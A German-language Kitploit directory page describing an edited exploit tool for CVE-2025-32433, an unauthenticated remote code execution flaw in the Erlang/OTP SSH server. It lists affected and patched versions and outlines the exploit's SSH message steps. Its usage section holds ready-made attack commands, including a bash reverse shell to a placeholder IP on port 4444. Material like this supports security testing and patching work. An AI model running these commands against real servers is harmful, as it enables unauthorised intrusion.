Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32433-Exploit-edited — Basiert auf der Originalversion:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Ersetzen Sie das Unicode-Häkchen durch ein ASCII-Zeichen für Windows-Kompatibilität | Kitploit
Tools/GitHubGitHub/chuzoux/cve-2025-32433-exploit-edited
SchwachstellenanalyseExploitationPenetrationstestsLernen & BildungRed TeamingRemote-Access-Tool
GitHubchuzoux/cve-2025-32433-exploit-edited

CVE-2025-32433-Exploit-edited

Basiert auf der Originalversion:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Ersetzen Sie das Unicode-Häkchen durch ein ASCII-Zeichen für Windows-Kompatibilität

Repository anzeigen
2vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32433 Exploit (Windows-kompatibel)

Erlang/OTP SSH – Nicht authentifizierte Remote-Codeausführung

Beschreibung

Dieses Repository enthält einen Exploit für CVE-2025-32433, eine kritische Schwachstelle für nicht authentifizierte Remote-Codeausführung im Erlang/OTP SSH-Server.

Hauptmerkmale:

  • ✅ Pre-Authentication RCE-Exploit
  • ✅ Behoben für Windows-GBK-Kodierungskompatibilität
  • ✅ Funktioniert auf Erlang/OTP-Versionen ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19

Schwachstellen-Details

CVE-ID: CVE-2025-32433
Schweregrad: Kritisch
Auswirkung: Nicht authentifizierte Remote-Codeausführung

Die Schwachstelle ermöglicht es Angreifern, ohne Authentifizierung beliebige Systembefehle auf Erlang/OTP SSH-Servern auszuführen, indem sie speziell gestaltete SSH-Protokollnachrichten senden.

Betroffene Versionen

root@kitploit:~
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)

Verwendung

root@kitploit:~
# Basic command execution python exploit.py -t <target-ip> -p 2222 -c "whoami" # Execute system command python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned" # Raw Erlang code execution python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").' # Reverse shell python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

Argumente

root@kitploit:~
-t, --target    Ziel-IP-Adresse (Standard: 127.0.0.1)
-p, --port      Ziel-Port (Standard: 2222)
-c, --command   Auszuführender Systembefehl
-e, --erlang    Auszuführender roher Erlang-Code

Windows-Kodierungsbehebung

Diese Version behebt das Kodierungsproblem des ursprünglichen Exploits:

Problem: Der ursprüngliche Exploit verwendete das Unicode-Häkchenzeichen (✓, U+2713), was zu GBK-Kodierungsfehlern unter Windows führt:

root@kitploit:~
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence

Lösung: Ersetzte das Unicode-Zeichen durch das standard ASCII + Zeichen für plattformübergreifende Kompatibilität.

Technische Details

Der Exploit funktioniert durch:

  1. Herstellen der SSH-Verbindung und Banner-Austausch
  2. Senden des SSH_MSG_KEXINIT-Pakets
  3. Öffnen des SSH-Kanals mit SSH_MSG_CHANNEL_OPEN
  4. Senden von SSH_MSG_CHANNEL_REQUEST mit bösartigem exec-Befehl vor der Authentifizierung
  5. Ausführen von beliebigem Erlang-Code über os:cmd()

Referenzen

  • GitHub-Sicherheitshinweis
  • Erlang/OTP Commit-Fix
  • RFC 4254 - SSH-Verbindungsprotokoll
  • ProDefense CVE-2025-32433

Gepatchte Versionen

  • OTP 27.3.3
  • OTP 26.2.5.11
  • OTP 25.3.2.20

Haftungsausschluss

Dieser Exploit wird ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Unautorisierter Zugriff auf Computersysteme ist illegal. Verwenden Sie ihn verantwortungsvoll und nur auf Systemen, für die Sie die ausdrückliche Erlaubnis zum Testen haben.

Lizenz

MIT-Lizenz

Autor

Modifiziert für Windows-Kompatibilität von chuzouX

Tool herunterladen